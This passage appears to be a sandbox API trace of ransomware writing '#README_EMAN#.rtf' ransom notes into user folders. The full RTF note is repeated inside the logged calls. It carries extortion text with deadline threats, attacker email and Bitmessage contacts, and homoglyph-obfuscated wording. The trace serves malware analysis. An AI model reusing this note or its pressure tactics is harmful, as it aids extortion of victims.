y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.107] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.107] CloseHandle (hObject=0x2ec) returned 1 [0291.108] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0291.108] GetLastError () returned 0x2 [0291.108] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 